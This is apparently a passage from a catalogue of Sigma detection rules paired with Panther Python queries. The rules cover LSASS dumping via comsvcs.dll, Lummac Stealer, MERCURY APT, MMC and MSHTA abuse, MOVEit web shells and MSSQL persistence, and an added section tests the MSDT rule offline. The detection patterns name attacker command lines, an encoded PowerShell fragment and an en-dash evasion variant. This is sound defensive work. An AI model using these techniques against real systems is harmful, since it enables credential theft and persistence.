    category: process_access
    product: windows
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        SourceImage|endswith: '\rundll32.exe'
        CallTrace|contains: 'comsvcs.dll'
    condition: selection
falsepositives:
    - Unknown
level: high
high Moderate High FP
Lummac Stealer Activity - Execution Of More.com And Vbc.exe
Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed in a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
status experimental author Joseliyo Sanchez, @Joseliyo_Jstnk ATT&CK technique id 19b3806e-46f2-4b4c-9337-e3d8653245ea
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\more.com"),
            any(
                [
                    event.deep_get("Image", default="").endswith("\\vbc.exe"),
                    event.deep_get("OriginalFileName", default="") == "vbc.exe",
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: |
    Detects the execution of more.com and vbc.exe in the process tree.
    This behavior was observed by a set of samples related to Lummac Stealer.
    The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-12-19
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
high Moderate High FP
MERCURY APT Activity
Detects suspicious command line patterns seen being used by MERCURY APT
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id a62298a3-1fe0-422f-9a68-ffbcbc5a123d
panther query
def rule(event):
    if all(
        [
            "-exec bypass -w 1 -enc" in event.deep_get("CommandLine", default=""),
            "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
            in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MERCURY APT Activity
id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
status: test
description: Detects suspicious command line patterns seen being used by MERCURY APT
references:
    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
author: Florian Roth (Nextron Systems)
date: 2022-08-26
modified: 2023-03-10
tags:
    - attack.execution
    - attack.t1059.001
    - attack.g0069
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '-exec bypass -w 1 -enc'
            - 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA'  # Start-Job -ScriptBlock
    condition: selection
falsepositives:
    - Unknown
level: high
high Moderate High FP
MMC Executing Files with Reversed Extensions Using RTLO Abuse
Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mmc.exe"),
                    event.deep_get("OriginalFileName", default="") == "MMC.exe",
                ]
            ),
            any(
                [
                    "cod.msc" in event.deep_get("CommandLine", default=""),
                    "fdp.msc" in event.deep_get("CommandLine", default=""),
                    "ftr.msc" in event.deep_get("CommandLine", default=""),
                    "lmth.msc" in event.deep_get("CommandLine", default=""),
                    "slx.msc" in event.deep_get("CommandLine", default=""),
                    "tdo.msc" in event.deep_get("CommandLine", default=""),
                    "xcod.msc" in event.deep_get("CommandLine", default=""),
                    "xslx.msc" in event.deep_get("CommandLine", default=""),
                    "xtpp.msc" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
status: experimental
description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
references:
    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
    - https://en.wikipedia.org/wiki/Right-to-left_override
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.execution
    - attack.stealth
    - attack.t1204.002
    - attack.t1218.014
    - attack.t1036.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        - Image|endswith: '\mmc.exe'
        - OriginalFileName: 'MMC.exe'
    selection_commandline:
        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
            - 'cod.msc'  # Reversed `.doc`
            - 'fdp.msc'  # Reversed `.pdf`
            - 'ftr.msc'  # Reversed `.rtf`
            - 'lmth.msc'  # Reversed `.html`
            - 'slx.msc'  # Reversed `.xls`
            - 'tdo.msc'  # Reversed `.odt`
            - 'xcod.msc'  # Reversed `.docx`
            - 'xslx.msc'  # Reversed `.xlsx`
            - 'xtpp.msc'  # Reversed `.pptx`
    condition: all of selection_*
falsepositives:
    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
    - Unconventional but non-malicious usage of RLO or reversed extensions.
level: high
high Moderate High FP
MMC Spawning Windows Shell
Detects a Windows command line executable started from MMC
status test author Karneades, Swisscom CSIRT ATT&CK sub-technique id 05a2ab7e-ce11-4b63-86db-ab32e763e11d
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\mmc.exe"),
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\cmd.exe"),
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                            event.deep_get("Image", default="").endswith("\\wscript.exe"),
                            event.deep_get("Image", default="").endswith("\\cscript.exe"),
                            event.deep_get("Image", default="").endswith("\\sh.exe"),
                            event.deep_get("Image", default="").endswith("\\bash.exe"),
                            event.deep_get("Image", default="").endswith("\\reg.exe"),
                            event.deep_get("Image", default="").endswith("\\regsvr32.exe"),
                        ]
                    ),
                    "\\BITSADMIN" in event.deep_get("Image", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MMC Spawning Windows Shell
id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
status: test
description: Detects a Windows command line executable started from MMC
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
author: Karneades, Swisscom CSIRT
date: 2019-08-05
modified: 2022-07-14
tags:
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith: '\mmc.exe'
    selection2:
        - Image|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\wscript.exe'
              - '\cscript.exe'
              - '\sh.exe'
              - '\bash.exe'
              - '\reg.exe'
              - '\regsvr32.exe'
        - Image|contains: '\BITSADMIN'
    condition: all of selection*
level: high
high Moderate High FP
MMC20 Lateral Movement
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
status test author @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) ATT&CK sub-technique id f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\svchost.exe"),
            event.deep_get("Image", default="").endswith("\\mmc.exe"),
            "-Embedding" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MMC20 Lateral Movement
id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
status: test
description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
author: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'
date: 2020-03-04
modified: 2021-11-27
tags:
    - attack.execution
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        Image|endswith: '\mmc.exe'
        CommandLine|contains: '-Embedding'
    condition: selection
falsepositives:
    - Unlikely
level: high
high Moderate Medium FP
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
panther query
def rule(event):
    if all(
        [
            event.deep_get("cs-method", default="") == "GET",
            any(
                [
                    "/human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                    "/_human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
id: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
status: test
description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
references:
    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
    - https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-03
modified: 2023-07-28
tags:
    - attack.persistence
    - attack.t1505.003
    - cve.2023-34362
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'GET'
        cs-uri-stem|contains:
            - '/human2.aspx'
            - '/_human2.aspx'
    condition: selection
falsepositives:
    - Unlikely
level: high
high Strong Medium FP
MSDT Execution Via Answer File
Detects execution of "msdt.exe" using an answer file, which simulates the legitimate way of calling msdt via "pcwrun.exe" (for example, from the Compatibility tab).
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9c8c7000-3065-44a8-a555-79bcba5d9955
panther query
def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("\\msdt.exe"),
            "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml"
            in event.deep_get("CommandLine", default=""),
            any(
                [
                    " -af " in event.deep_get("CommandLine", default=""),
                    " /af " in event.deep_get("CommandLine", default=""),
                    " –af " in event.deep_get("CommandLine", default=""),
                    " —af " in event.deep_get("CommandLine", default=""),
                    " ―af " in event.deep_get("CommandLine", default=""),
                ]
            ),
            not event.deep_get("ParentImage", default="").endswith("\\pcwrun.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSDT Execution Via Answer File
id: 9c8c7000-3065-44a8-a555-79bcba5d9955
status: test
description: |
    Detects execution of "msdt.exe" with an answer file ("-af"), mimicking the legitimate way msdt is launched by "pcwrun.exe" (for example from the Compatibility tab), but without pcwrun.exe as the parent process.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
modified: 2025-10-29
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msdt.exe'
        CommandLine|contains: '\WINDOWS\diagnostics\index\PCWDiagnostic.xml'
        CommandLine|contains|windash: ' -af '
    filter_main_pcwrun:
        ParentImage|endswith: '\pcwrun.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Possible undocumented parents of "msdt" other than "pcwrun".
level: high
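Worked check for the rule above, added here as an example; it is not part of the Sigma corpus or Panther's own code. Panther passes rule(event) an object with a deep_get method, so exercising a rendered rule offline needs a small stand-in: the Event shim below assumes deep_get(*keys, default=None) semantics, which is all flat Sysmon fields need. The rule body restates the Sigma logic, expands the windash variants the way the rendering does, and runs over constructed process-creation records, including an en dash evasion and the legitimate pcwrun.exe parent. One difference from the rendered query: Sigma matching is case-insensitive, so Image and ParentImage are case-folded here, whereas the pasted query compares them as-is.

```python
class Event(dict):
    """Minimal stand-in for the object Panther hands to rule(event), so a rendered
    rule can be exercised offline. Assumption: Panther's deep_get(*keys, default=None)
    walks nested keys the same way; flat Sysmon fields are all this shim needs."""

    def deep_get(self, *keys, default=None):
        node = self
        for key in keys:
            if not isinstance(node, dict) or key not in node:
                return default
            node = node[key]
        return node


# The dash look-alikes that Sigma's "windash" modifier expands " -af " into.
DASHES = ("-", "/", "\u2013", "\u2014", "\u2015")


def rule(event):
    """msdt.exe launched with an answer file, but not by pcwrun.exe (the Sigma logic above)."""
    image = event.deep_get("Image", default="").lower()
    cmd = event.deep_get("CommandLine", default="")
    parent = event.deep_get("ParentImage", default="").lower()
    return (
        image.endswith("\\msdt.exe")
        and "\\windows\\diagnostics\\index\\pcwdiagnostic.xml" in cmd.lower()
        and any(f" {dash}af " in cmd for dash in DASHES)
        and not parent.endswith("\\pcwrun.exe")
    )


def sysmon_process(cmd, parent):
    """Constructed record shaped like Sysmon event 1 (not real telemetry)."""
    return Event(Image="C:\\Windows\\System32\\msdt.exe", CommandLine=cmd, ParentImage=parent)


# Answer-file invocation as documented on the LOLBAS page the rule references.
ANSWER_FILE = (
    "-path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml "
    "-af C:\\Users\\Public\\pcw.xml /skip TRUE"
)

EVENTS = {
    "from_cmd": sysmon_process("msdt.exe " + ANSWER_FILE, "C:\\Windows\\System32\\cmd.exe"),
    # en dash instead of "-": an evasion a plain " -af " check would miss
    "en_dash": sysmon_process(
        "msdt.exe " + ANSWER_FILE.replace(" -af ", " \u2013af "),
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ),
    # the legitimate Compatibility-tab path, removed by the parent filter
    "from_pcwrun": sysmon_process("msdt.exe " + ANSWER_FILE, "C:\\Windows\\System32\\pcwrun.exe"),
    # no answer file: an ordinary troubleshooter launch
    "no_af": sysmon_process("msdt.exe -id PCWDiagnostic", "C:\\Windows\\explorer.exe"),
}


def evaluate(events=EVENTS):
    """Map each constructed event name to whether the rule fires on it."""
    return {name: rule(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, fired in evaluate().items():
        print(f"{name:12s} {'ALERT' if fired else 'ok'}")
```

The Event shim is the reusable part: any rendered query on this page can be dropped in beside it and run over a handful of constructed events before it goes into a detection, which is the "Validate" step the page's introduction asks for.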
high Strong High FP
MSHTA Execution with Suspicious File Extensions
Detects execution of mshta.exe with a command line referencing file extensions that do not typically carry HTA (HTML Application) content, such as .png, .jpg, .zip and .pdf; such files are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors abuse this LOLBin to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
status test author Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id cc7abbd0-762b-41e3-8a26-57ad50d2eea3
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("OriginalFileName", default="") == "mshta.exe",
                ]
            ),
            any(
                [
                    ".7z" in event.deep_get("CommandLine", default=""),
                    ".avi" in event.deep_get("CommandLine", default=""),
                    ".bat" in event.deep_get("CommandLine", default=""),
                    ".bmp" in event.deep_get("CommandLine", default=""),
                    ".conf" in event.deep_get("CommandLine", default=""),
                    ".csv" in event.deep_get("CommandLine", default=""),
                    ".dll" in event.deep_get("CommandLine", default=""),
                    ".doc" in event.deep_get("CommandLine", default=""),
                    ".gif" in event.deep_get("CommandLine", default=""),
                    ".gz" in event.deep_get("CommandLine", default=""),
                    ".ini" in event.deep_get("CommandLine", default=""),
                    ".jpe" in event.deep_get("CommandLine", default=""),
                    ".jpg" in event.deep_get("CommandLine", default=""),
                    ".json" in event.deep_get("CommandLine", default=""),
                    ".lnk" in event.deep_get("CommandLine", default=""),
                    ".log" in event.deep_get("CommandLine", default=""),
                    ".mkv" in event.deep_get("CommandLine", default=""),
                    ".mp3" in event.deep_get("CommandLine", default=""),
                    ".mp4" in event.deep_get("CommandLine", default=""),
                    ".pdf" in event.deep_get("CommandLine", default=""),
                    ".png" in event.deep_get("CommandLine", default=""),
                    ".ppt" in event.deep_get("CommandLine", default=""),
                    ".rar" in event.deep_get("CommandLine", default=""),
                    ".rtf" in event.deep_get("CommandLine", default=""),
                    ".svg" in event.deep_get("CommandLine", default=""),
                    ".tar" in event.deep_get("CommandLine", default=""),
                    ".tmp" in event.deep_get("CommandLine", default=""),
                    ".txt" in event.deep_get("CommandLine", default=""),
                    ".xls" in event.deep_get("CommandLine", default=""),
                    ".xml" in event.deep_get("CommandLine", default=""),
                    ".yaml" in event.deep_get("CommandLine", default=""),
                    ".yml" in event.deep_get("CommandLine", default=""),
                    ".zip" in event.deep_get("CommandLine", default=""),
                    "vbscript" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
    Detects execution of mshta.exe with a command line referencing file extensions that do not typically carry HTA (HTML Application) content,
    such as .png, .jpg, .zip and .pdf; such files are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
    containing VBScript or JScript. Threat actors abuse this LOLBin to download and
    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
    - http://blog.sevagas.com/?Hacking-around-HTA-files
    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
    - https://twitter.com/mattifestation/status/1326228491302563846
    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
    - attack.stealth
    - attack.t1140
    - attack.t1218.005
    - attack.execution
    - attack.t1059.007
    - cve.2020-1599
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mshta.exe'
        - OriginalFileName: 'mshta.exe'
    selection_cli:
        CommandLine|contains:
            - '.7z'
            - '.avi'
            - '.bat'
            - '.bmp'
            - '.conf'
            - '.csv'
            - '.dll'
            - '.doc'
            - '.gif'
            - '.gz'
            - '.ini'
            - '.jpe'
            - '.jpg'
            - '.json'
            - '.lnk'
            - '.log'
            - '.mkv'
            - '.mp3'
            - '.mp4'
            - '.pdf'
            - '.png'
            - '.ppt'
            - '.rar'
            - '.rtf'
            - '.svg'
            - '.tar'
            - '.tmp'
            - '.txt'
            - '.xls'
            - '.xml'
            - '.yaml'
            - '.yml'
            - '.zip'
            - 'vbscript'
            # - '.chm'  # could be prone to false positives
            # - '.exe'
    condition: all of selection_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high
high Moderate Low FP
MSMQ Corrupted Packet Encountered
Detects corrupted packets received by the MSMQ service (Application log event 2027), which can be a sign of CVE-2023-21554 (QueueJumper) exploitation attempts
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id ae94b10d-fee9-4767-82bb-439b309d5a27
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSMQ",
            event.deep_get("EventID", default="") == 2027,
            event.deep_get("Level", default="") == 2,
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSMQ Corrupted Packet Encountered
id: ae94b10d-fee9-4767-82bb-439b309d5a27
status: test
description: Detects corrupted packets received by the MSMQ service (Application log event 2027), which can be a sign of CVE-2023-21554 (QueueJumper) exploitation attempts
references:
    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSMQ'
        EventID: 2027
        Level: 2
    condition: selection
falsepositives:
    - Unknown
level: high
high Strong Medium FP
MSSQL Add Account To Sysadmin Role
Detects an account being added to the MSSQL "sysadmin" fixed server role, a common way for an attacker to backdoor the server
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 08200f85-2678-463e-9c32-88dce2f073d1
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sysadmin" in event.deep_get("Data", default=""),
            "statement:alter server role [sysadmin] add member "
            in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Add Account To Sysadmin Role
id: 08200f85-2678-463e-9c32-88dce2f073d1
status: test
description: Detects an account being added to the MSSQL "sysadmin" fixed server role, a common way for an attacker to backdoor the server
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sysadmin'
            - 'statement:alter server role [sysadmin] add member '
    condition: selection
falsepositives:
    - Rare legitimate administrative activity
level: high
high Strong Medium FP
MSSQL Disable Audit Settings
Detects execution of the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statements, used to disable or delete audit logging on the server
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            any(
                [
                    "statement:ALTER SERVER AUDIT" in event.deep_get("Data", default=""),
                    "statement:DROP SERVER AUDIT" in event.deep_get("Data", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Disable Audit Settings
id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
status: test
description: Detects execution of the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statements, used to disable or delete audit logging on the server
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.defense-impairment
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains:
            - 'statement:ALTER SERVER AUDIT'
            - 'statement:DROP SERVER AUDIT'
    condition: selection
falsepositives:
    - This event should only fire when an administrator modifies the audit policy, which should be rare once auditing is set up
level: high
high Strong Medium FP
MSSQL Extended Stored Procedure Backdoor Maggie
Detects the execution of the extended stored procedure backdoor named Maggie on a Microsoft SQL Server
status test author Denis Szadkowski, DIRT / DCSO CyTec ATT&CK technique id 711ab2fe-c9ba-4746-8840-5228a58c3cb8
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSSQLSERVER",
            event.deep_get("EventID", default="") == 8128,
            "maggie" in event.deep_get("Message", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Extended Stored Procedure Backdoor Maggie
id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
status: test
description: Detects the execution of the extended stored procedure backdoor named Maggie on a Microsoft SQL Server
references:
    - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
author: Denis Szadkowski, DIRT / DCSO CyTec
date: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSSQLSERVER'
        EventID: 8128
        Message|contains: 'maggie'
    condition: selection
falsepositives:
    - Legitimate extended stored procedures named maggie
level: high
high Strong Medium FP
MSSQL SPProcoption Set
Detects when a stored procedure is set or cleared for automatic execution in MSSQL via "sp_procoption". A stored procedure marked for automatic execution runs every time the SQL Server instance starts
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id b3d57a5c-c92e-4b48-9a79-5f124b7cf964
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sp_procoption" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL SPProcoption Set
id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964
status: test
description: Detects when a stored procedure is set or cleared for automatic execution in MSSQL via "sp_procoption". A stored procedure marked for automatic execution runs every time the SQL Server instance starts
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "sp_procoption" must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sp_procoption'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Legitimate use of the feature by administrators (rare)
level: high
high Strong Medium FP
MSSQL XPCmdshell Option Change
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id d08dd86f-681e-4a00-a92c-1db218754417
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 15457,
            "xp_cmdshell" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL XPCmdshell Option Change
id: d08dd86f-681e-4a00-a92c-1db218754417
status: test
description: |
    Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 15457
        Data|contains: 'xp_cmdshell'
    condition: selection
falsepositives:
    - Legitimate enabling or disabling of the setting
    - Note that event 15457 records both the old and the new value of the option, so this rule triggers on both enabling and disabling
level: high
high Moderate Medium FP
MSSQL XPCmdshell Suspicious Execution
Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 7f103213-a04e-4d59-8261-213dddf22314
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:xp_cmdshell" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL XPCmdshell Suspicious Execution
id: 7f103213-a04e-4d59-8261-213dddf22314
status: test
